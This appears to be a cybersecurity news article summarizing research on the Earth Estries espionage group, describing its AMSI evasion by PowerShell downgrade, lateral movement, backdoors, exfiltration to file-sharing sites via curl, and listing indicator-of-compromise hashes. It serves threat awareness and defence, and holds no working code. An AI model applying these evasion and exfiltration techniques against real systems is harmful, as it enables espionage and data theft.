A new sophisticated cyber espionage group named Earth Estries, which overlaps notorious threat group FamousSparrow, was unveiled.
The group has been active since 2020 and targets multiple government and technology organizations utilizing hacking tools and backdoors.
Trend Micro has released the latest research report regarding the tactics and techniques used by this group.
They use PowerShell downgrade attacks to avoid detection from Windows Antimalware Scan Interface’s (AMSI) logging mechanism.
Hacker Group Attack Chain
For initial infection, it targets accounts with administrative privileges and compromises one of the victim’s internal servers.
Later, they employed backdoors and hacking tools for lateral movement through the Server Message Block (SMB) and WMI command line (WMIC).
They utilize various information stealers, browser data stealers, and port scanners to leverage the attack. However, they often utilize backdoors such as Zingdoor, TrillClient, and HemiGate.
In Addition to that, they utilize commonly used remote control tools like Cobalt Strike, PlugX, or Meterpreter stagers. These tools come as encrypted payloads loaded by custom loader DLLs.
After each deployment of malware, they archived the data in a folder. They target PDF and DDF files and upload them to AnonFiles or File.io via curl.exe.
In order to avoid detection, they employ a new piece of malware every time they start the operation. Their C&C servers are hosted on virtual private server (VPS) services located in different countries, and they use fastlyCDN services to hide their IP.
They target organizations in the government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the US.
In addition, the actors abuse public services such as Github, Gmail, AnonFiles, and File.io to exchange or transfer commands and stolen data.
Indicator of Compromise
cd2b703e1b7cfd6c552406f44ec05480209003789ad4fbba4d4cffd4f104b0a00eaa67fe81cec0a41cd42866df1223cb7d2b5659ab295dffe64fe9c3b76720aae6f9756613345fd01bbcf28eba15d52705ef4d144c275b8cfe868a5d28c24140c7023183e815b9aff68d3eba6c2ca105dbe0a9b05cd209908dcee907a64ce80b 1a9e0c7c88e7a8b065ec88809187f67d920e7845350d94098645e592ec5534f6 efb98b8f882ac84332e7dfdc996a081d1c5e6189ad726f8f8afec5d36a20a730 8476ad68ce54b458217ab165d66a899d764eae3ad30196f35d2ff20d3f398523 dff1d282e754f378ef00fb6ebe9944fee6607d9ee24ec3ca643da27f27520ac3 42d4eb7f04111631891379c5cce55480d2d9d2ef8feaf1075e1aed0c52df4bb9 45b9204ccbad92e4e5fb9e31aab683eb5221eb5f5688b1aae98d9c0f1c920227 98e250bc06de38050fdeab9b1e2ef7e4d8c401b33fd5478f3b85197112858f4e b1bc10fa25a4fd5ae7948c6523eb975be8d0f52d1572c57a7ef736134b99658649a0349dfa79b211fc2c5753a9b87f8cd2e9a42e55eca6f350f30c60de2866ce 71a503b5b6ec8321346bee3f6129af0b8ad490a36092488d085085cdc0fc6b9d28109c650df5481c3997b720bf8ce09e7472d9cdb3f02dd844783fd2b1400c72a8dd0ca6151000de33335f48a832d24412de13ce05ea6f279bf4aaaa2e5aaecbdeaa3143814c6fe9279e8bc0706df22d63ef197af980d8feae9a8468f441efecb6481e0edc36a0472ab0ce7d0817f1773c4af9307ae60890a667930558a762ffeeb3d2e87d343b2acf6bc8e4e4122d76a9ad200ae52340c61e537a80666705ed4b014891df3348a76750563ae10b70721e028381f3964930d2dd49b9597ffac32531891691ef674345f098ef18b274091acdf3f2808cca753674599c043ccd7dc59e17806e3a58792f07662b4985119252c8221688084d20b599699bfdb272d8e1a7e5f27362aaf0d12b58b96a816ef61a2a498def9805297aa81f6f83729230 ca6713bedbd19c2ad560700b41774825615b0fe80bf61751177ffbc26c77aa30cdadad8d7ced1370baa5d1ffe435bed78c2d58ed4cda364b8a7484e3c7cdac82f3384723b21f9a928029bb3ee116f9adbc4f7ec66d5a856e817c3dc16d149d415e0893ce227464fb29d76e0500c518935d11379d17fb14effaef82e962ff76f6223d956df81dcb6135c6ce00ee14d0efede9fb399b56d2ee95b7b0538fe12c
